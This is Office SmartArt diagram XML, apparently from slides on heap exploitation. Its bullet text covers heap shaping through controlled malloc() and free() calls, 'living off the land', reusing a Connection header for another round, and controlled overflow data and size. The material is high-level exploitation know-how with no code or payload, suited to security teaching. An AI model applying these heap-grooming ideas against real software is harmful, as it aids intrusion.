    <dgm:cxn modelId="{693C798F-AFAC-F540-B4CD-4B997D55FFC6}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{46D12188-12F8-2E46-8180-05CFD4EF3FFA}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D59C7415-CD3D-1741-BBE0-EEF6B8BE49C2}" type="presParOf" srcId="{46D12188-12F8-2E46-8180-05CFD4EF3FFA}" destId="{FD4B9195-C049-1542-BA91-309152EF96A7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A7849BAA-3E4C-9A4F-BD3C-2D2366F92878}" type="presParOf" srcId="{46D12188-12F8-2E46-8180-05CFD4EF3FFA}" destId="{6E6396B2-B749-A146-97EF-77F9C856450F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FC182420-5238-E945-A314-3CE736A2D4D2}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{E132D0F2-93C3-9E43-BF2E-2BBCBD22740C}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8B18A016-8357-7247-AD37-480C3E7D734F}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{120E51CA-335C-E044-B1D4-4611BAE02C7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F97C5D-029D-4D48-BCDA-75E6FF4ABEF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404987-BF29-41BB-A860-5822B9E1A798}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Easy way to control the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1" i="1" u="sng"/>
            <a:t>shape</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t> of the heap</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{281B0139-5A60-4476-9E9B-B17F2161EFEA}" type="parTrans" cxnId="{D96A1EBB-C33B-43C1-966D-7DF2C1EC6554}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F55C6944-46DD-4CDB-A079-BF8AFFE3097B}" type="sibTrans" cxnId="{D96A1EBB-C33B-43C1-966D-7DF2C1EC6554}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{27622281-496A-4BF6-BDA0-4C5C21EFC31B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Calls to 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malloc() </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>&amp; 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free() </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>with lots of control</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D3ACF81A-C713-4D97-B3BB-E6D5ADFA8900}" type="parTrans" cxnId="{8D0EEDA5-5099-4F96-A1F5-21EE19AE14BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{01423F21-90C4-406B-B748-4F0CDA7248DB}" type="sibTrans" cxnId="{8D0EEDA5-5099-4F96-A1F5-21EE19AE14BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7DC35EF-5180-415C-834A-4CB26AF4A4A8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="1" u="sng"/>
            <a:t>Amount</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t> of allocations/frees</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A50AC124-1ACA-4643-948E-6C08ACF74047}" type="parTrans" cxnId="{45CC90AF-3276-4CE0-BD5A-F89FFF64A677}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{506F3CE6-16C4-4604-BDFC-9771FEE171A9}" type="sibTrans" cxnId="{45CC90AF-3276-4CE0-BD5A-F89FFF64A677}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD090837-8441-4DC7-B5F7-BE2B8145CBD2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="1" u="sng"/>
            <a:t>Size</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t> of allocations/frees</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{464FDEEC-834B-46BF-B5D4-43C0122CA0BE}" type="parTrans" cxnId="{16E35751-2D38-4510-852D-3F5A9B75D80C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{029AD50B-D804-4A8B-A326-9D046345C298}" type="sibTrans" cxnId="{16E35751-2D38-4510-852D-3F5A9B75D80C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" type="pres">
      <dgm:prSet presAssocID="{E6F97C5D-029D-4D48-BCDA-75E6FF4ABEF8}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2F61BD3B-5BE1-BC49-BD74-96BCC9800964}" type="pres">
      <dgm:prSet presAssocID="{40404987-BF29-41BB-A860-5822B9E1A79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70937FC-D4FF-E146-AE94-618314D5FAC5}" type="pres">
      <dgm:prSet presAssocID="{F55C6944-46DD-4CDB-A079-BF8AFFE3097B}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{46C2DB11-403D-084C-9CEE-E4C6D43A4FD7}" type="pres">
      <dgm:prSet presAssocID="{27622281-496A-4BF6-BDA0-4C5C21EFC31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F6972D1-DF58-C144-81E3-091E32DD0B91}" type="pres">
      <dgm:prSet presAssocID="{01423F21-90C4-406B-B748-4F0CDA7248DB}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ABBE7F2A-F497-DB4E-B666-CE6AE87251AF}" type="pres">
      <dgm:prSet presAssocID="{D7DC35EF-5180-415C-834A-4CB26AF4A4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C2835A-527C-224C-8CBA-B1AD00BCD09B}" type="pres">
      <dgm:prSet presAssocID="{506F3CE6-16C4-4604-BDFC-9771FEE171A9}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BB096D44-F5EE-3F49-94B3-3DC92C39AA3C}" type="pres">
      <dgm:prSet presAssocID="{AD090837-8441-4DC7-B5F7-BE2B8145CBD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F72F507-E9D0-9440-B3EB-B2D263AB4E0A}" type="presOf" srcId="{AD090837-8441-4DC7-B5F7-BE2B8145CBD2}" destId="{BB096D44-F5EE-3F49-94B3-3DC92C39AA3C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DD5DC038-A742-434B-BCFA-E877A5326C85}" type="presOf" srcId="{40404987-BF29-41BB-A860-5822B9E1A798}" destId="{2F61BD3B-5BE1-BC49-BD74-96BCC9800964}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{16E35751-2D38-4510-852D-3F5A9B75D80C}" srcId="{E6F97C5D-029D-4D48-BCDA-75E6FF4ABEF8}" destId="{AD090837-8441-4DC7-B5F7-BE2B8145CBD2}" srcOrd="3" destOrd="0" parTransId="{464FDEEC-834B-46BF-B5D4-43C0122CA0BE}" sibTransId="{029AD50B-D804-4A8B-A326-9D046345C298}"/>
    <dgm:cxn modelId="{8FE65E82-11C8-2646-9577-CAC00DBF7CDC}" type="presOf" srcId="{D7DC35EF-5180-415C-834A-4CB26AF4A4A8}" destId="{ABBE7F2A-F497-DB4E-B666-CE6AE87251AF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{829AC38D-A5EF-1247-BF52-89CE38FE2FD8}" type="presOf" srcId="{E6F97C5D-029D-4D48-BCDA-75E6FF4ABEF8}" destId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8D0EEDA5-5099-4F96-A1F5-21EE19AE14BE}" srcId="{E6F97C5D-029D-4D48-BCDA-75E6FF4ABEF8}" destId="{27622281-496A-4BF6-BDA0-4C5C21EFC31B}" srcOrd="1" destOrd="0" parTransId="{D3ACF81A-C713-4D97-B3BB-E6D5ADFA8900}" sibTransId="{01423F21-90C4-406B-B748-4F0CDA7248DB}"/>
    <dgm:cxn modelId="{45CC90AF-3276-4CE0-BD5A-F89FFF64A677}" srcId="{E6F97C5D-029D-4D48-BCDA-75E6FF4ABEF8}" destId="{D7DC35EF-5180-415C-834A-4CB26AF4A4A8}" srcOrd="2" destOrd="0" parTransId="{A50AC124-1ACA-4643-948E-6C08ACF74047}" sibTransId="{506F3CE6-16C4-4604-BDFC-9771FEE171A9}"/>
    <dgm:cxn modelId="{D96A1EBB-C33B-43C1-966D-7DF2C1EC6554}" srcId="{E6F97C5D-029D-4D48-BCDA-75E6FF4ABEF8}" destId="{40404987-BF29-41BB-A860-5822B9E1A798}" srcOrd="0" destOrd="0" parTransId="{281B0139-5A60-4476-9E9B-B17F2161EFEA}" sibTransId="{F55C6944-46DD-4CDB-A079-BF8AFFE3097B}"/>
    <dgm:cxn modelId="{90C27EEA-D8C6-A247-B5C5-4DB646824D2D}" type="presOf" srcId="{27622281-496A-4BF6-BDA0-4C5C21EFC31B}" destId="{46C2DB11-403D-084C-9CEE-E4C6D43A4FD7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B442D91E-BFD9-6D4A-89AB-5BD6942D5273}" type="presParOf" srcId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" destId="{2F61BD3B-5BE1-BC49-BD74-96BCC9800964}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B01918F7-EDB6-1D42-9B30-2B304D3521EE}" type="presParOf" srcId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" destId="{670937FC-D4FF-E146-AE94-618314D5FAC5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DACF28D2-25AF-6E41-B8EF-76E5D51077EF}" type="presParOf" srcId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" destId="{46C2DB11-403D-084C-9CEE-E4C6D43A4FD7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5780DED3-3763-1145-A61E-0CA5FFE6457F}" type="presParOf" srcId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" destId="{CF6972D1-DF58-C144-81E3-091E32DD0B91}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C0AB083F-8EC1-A34B-BD7A-4BDCB04B7E98}" type="presParOf" srcId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" destId="{ABBE7F2A-F497-DB4E-B666-CE6AE87251AF}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{94572269-E783-9344-8E6B-29E2FBC73319}" type="presParOf" srcId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" destId="{ECC2835A-527C-224C-8CBA-B1AD00BCD09B}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D6C65A47-2D31-A24A-9EC3-58E25C914620}" type="presParOf" srcId="{CCDFF93F-F44A-AA4B-BA9B-F6FFFD99BAB3}" destId="{BB096D44-F5EE-3F49-94B3-3DC92C39AA3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732F61-6057-46A8-BCE5-57D63FA1C0B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AC4D03-38F9-4DC2-8A2D-134B826DF0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Allocator based techniques don’t always work</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BED1DFED-E640-466B-9EAF-4F770342991E}" type="parTrans" cxnId="{658E5F03-7272-4C97-8374-975EC3B56804}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A875749A-B507-40EF-97FD-CFB0B9D6F4AF}" type="sibTrans" cxnId="{658E5F03-7272-4C97-8374-975EC3B56804}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{358F7C0A-867F-45E7-B16B-C573BF7E99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Living off the land</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB2E0FDA-C99D-4CE3-8FC0-5B44E632C25A}" type="parTrans" cxnId="{586ED6EF-4B78-4654-B112-F5BD09A199C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED462EBA-B153-432D-BE80-83B70E93AECA}" type="sibTrans" cxnId="{586ED6EF-4B78-4654-B112-F5BD09A199C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7FBB022-6CA5-4097-8D36-A806A28C1EA2}" type="pres">
      <dgm:prSet presAssocID="{71732F61-6057-46A8-BCE5-57D63FA1C0B3}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A0BFDC60-FF35-4194-93BA-2D05E3EE933D}" type="pres">
      <dgm:prSet presAssocID="{9BAC4D03-38F9-4DC2-8A2D-134B826DF0F2}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{80709741-BCF9-496F-93DB-5ED46C7DE7D9}" type="pres">
      <dgm:prSet presAssocID="{9BAC4D03-38F9-4DC2-8A2D-134B826DF0F2}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{81D9F4EC-ADC8-4A2B-8B80-76608FFCA641}" type="pres">
      <dgm:prSet presAssocID="{9BAC4D03-38F9-4DC2-8A2D-134B826DF0F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99A9427-E97A-499E-A106-0DD0EC946863}" type="pres">
      <dgm:prSet presAssocID="{9BAC4D03-38F9-4DC2-8A2D-134B826DF0F2}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5248EB95-1FD8-4043-9E37-704C714EB774}" type="pres">
      <dgm:prSet presAssocID="{9BAC4D03-38F9-4DC2-8A2D-134B826DF0F2}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4418884B-61B8-438C-8CD9-19403E00EBE7}" type="pres">
      <dgm:prSet presAssocID="{A875749A-B507-40EF-97FD-CFB0B9D6F4AF}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7C6D9FB0-3202-410D-8B70-4403CA3FD9BD}" type="pres">
      <dgm:prSet presAssocID="{358F7C0A-867F-45E7-B16B-C573BF7E99A1}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C102885D-AD41-441B-8AF8-DE058AFDB7A3}" type="pres">
      <dgm:prSet presAssocID="{358F7C0A-867F-45E7-B16B-C573BF7E99A1}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4B2913E4-0101-43A5-9C50-C90938DB4DFB}" type="pres">
      <dgm:prSet presAssocID="{358F7C0A-867F-45E7-B16B-C573BF7E99A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A283E68-9ED5-481E-8805-193B96B8FA7B}" type="pres">
      <dgm:prSet presAssocID="{358F7C0A-867F-45E7-B16B-C573BF7E99A1}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{71CFAF0E-F629-4D86-9C84-A21BF36CE7C3}" type="pres">
      <dgm:prSet presAssocID="{358F7C0A-867F-45E7-B16B-C573BF7E99A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58E5F03-7272-4C97-8374-975EC3B56804}" srcId="{71732F61-6057-46A8-BCE5-57D63FA1C0B3}" destId="{9BAC4D03-38F9-4DC2-8A2D-134B826DF0F2}" srcOrd="0" destOrd="0" parTransId="{BED1DFED-E640-466B-9EAF-4F770342991E}" sibTransId="{A875749A-B507-40EF-97FD-CFB0B9D6F4AF}"/>
    <dgm:cxn modelId="{68014A3B-9497-43D9-8227-8824E1C55421}" type="presOf" srcId="{71732F61-6057-46A8-BCE5-57D63FA1C0B3}" destId="{A7FBB022-6CA5-4097-8D36-A806A28C1EA2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{6FF316D4-A1D2-4570-BA4D-15DEC67DF842}" type="presOf" srcId="{9BAC4D03-38F9-4DC2-8A2D-134B826DF0F2}" destId="{5248EB95-1FD8-4043-9E37-704C714EB774}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{F5EA5BED-E98B-4630-8CC0-77D6D0CD84D0}" type="presOf" srcId="{358F7C0A-867F-45E7-B16B-C573BF7E99A1}" destId="{71CFAF0E-F629-4D86-9C84-A21BF36CE7C3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{586ED6EF-4B78-4654-B112-F5BD09A199C6}" srcId="{71732F61-6057-46A8-BCE5-57D63FA1C0B3}" destId="{358F7C0A-867F-45E7-B16B-C573BF7E99A1}" srcOrd="1" destOrd="0" parTransId="{BB2E0FDA-C99D-4CE3-8FC0-5B44E632C25A}" sibTransId="{ED462EBA-B153-432D-BE80-83B70E93AECA}"/>
    <dgm:cxn modelId="{8790A1A0-FC8D-4521-89B6-FEB0908C9E20}" type="presParOf" srcId="{A7FBB022-6CA5-4097-8D36-A806A28C1EA2}" destId="{A0BFDC60-FF35-4194-93BA-2D05E3EE933D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{C1873879-3494-453C-8312-8E0C3B67E1BB}" type="presParOf" srcId="{A0BFDC60-FF35-4194-93BA-2D05E3EE933D}" destId="{80709741-BCF9-496F-93DB-5ED46C7DE7D9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{4D843992-E351-4444-A848-830E504BEC7D}" type="presParOf" srcId="{A0BFDC60-FF35-4194-93BA-2D05E3EE933D}" destId="{81D9F4EC-ADC8-4A2B-8B80-76608FFCA641}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{AF7D5951-8EA8-483E-BC34-7361AF74F9F1}" type="presParOf" srcId="{A0BFDC60-FF35-4194-93BA-2D05E3EE933D}" destId="{F99A9427-E97A-499E-A106-0DD0EC946863}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{A71BD63C-0AC2-4EEB-AD8C-15B0F993FAAE}" type="presParOf" srcId="{A0BFDC60-FF35-4194-93BA-2D05E3EE933D}" destId="{5248EB95-1FD8-4043-9E37-704C714EB774}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{95E8AD48-C7A2-4E8B-BCFB-5CA3BDBDF576}" type="presParOf" srcId="{A7FBB022-6CA5-4097-8D36-A806A28C1EA2}" destId="{4418884B-61B8-438C-8CD9-19403E00EBE7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{EBFFD5DB-AE67-45FE-A283-25768FD06E28}" type="presParOf" srcId="{A7FBB022-6CA5-4097-8D36-A806A28C1EA2}" destId="{7C6D9FB0-3202-410D-8B70-4403CA3FD9BD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{68699073-849A-4FEF-B65E-14D4AB2256CC}" type="presParOf" srcId="{7C6D9FB0-3202-410D-8B70-4403CA3FD9BD}" destId="{C102885D-AD41-441B-8AF8-DE058AFDB7A3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{40F5092D-664D-4FCB-A753-08FC9D128D99}" type="presParOf" srcId="{7C6D9FB0-3202-410D-8B70-4403CA3FD9BD}" destId="{4B2913E4-0101-43A5-9C50-C90938DB4DFB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{45B59910-CB0B-44BD-A40C-9332C55036AC}" type="presParOf" srcId="{7C6D9FB0-3202-410D-8B70-4403CA3FD9BD}" destId="{5A283E68-9ED5-481E-8805-193B96B8FA7B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{2A663024-4238-44D5-854C-CB0F73B3D70C}" type="presParOf" srcId="{7C6D9FB0-3202-410D-8B70-4403CA3FD9BD}" destId="{71CFAF0E-F629-4D86-9C84-A21BF36CE7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55780C-6F8D-4255-9DD1-4810392A304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389213-35C6-4349-93DC-DCC636E2A0F9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Towards the end of program </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F954869-7C09-41D9-AFD0-E7DF73961C14}" type="parTrans" cxnId="{55059282-1624-4300-A788-8AF2462836E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{62731443-70EE-448E-9362-3B3E7CF0E158}" type="sibTrans" cxnId="{55059282-1624-4300-A788-8AF2462836E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AF67123-79AA-41ED-8854-F4DB7C605695}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Use 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Connection</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> header for another round</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{555941CD-3722-4C83-8F11-D59C03D051B6}" type="parTrans" cxnId="{E61C5D5D-804C-46A1-A085-FF6E5073B15F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFCDAD55-86CB-4EC2-BD37-94417C1B08CA}" type="sibTrans" cxnId="{E61C5D5D-804C-46A1-A085-FF6E5073B15F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Is data controlled in overflow? Yes!</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A995CA6-9EE7-43A1-A44D-06D0098887CA}" type="parTrans" cxnId="{57BFAE27-0004-48BC-9FEE-8587159DD4B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{577B869B-09A3-4BDE-B8E5-6799843C857B}" type="sibTrans" cxnId="{57BFAE27-0004-48BC-9FEE-8587159DD4B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{441B4E51-B22E-4F8E-929C-BF6ABEB58711}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Fully controlled size on overflow? Yes!</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{523ECD28-828F-4414-B9BE-D7F1C3118114}" type="parTrans" cxnId="{7EE52269-C642-4297-9E02-372E5A8D056D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{22766A84-7DD7-4223-B372-870DD6027338}" type="sibTrans" cxnId="{7EE52269-C642-4297-9E02-372E5A8D056D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A50B4C53-0B8E-A745-8815-784B2F9F0501}">
      <dgm:prSet/>
      <dgm:spPr/>
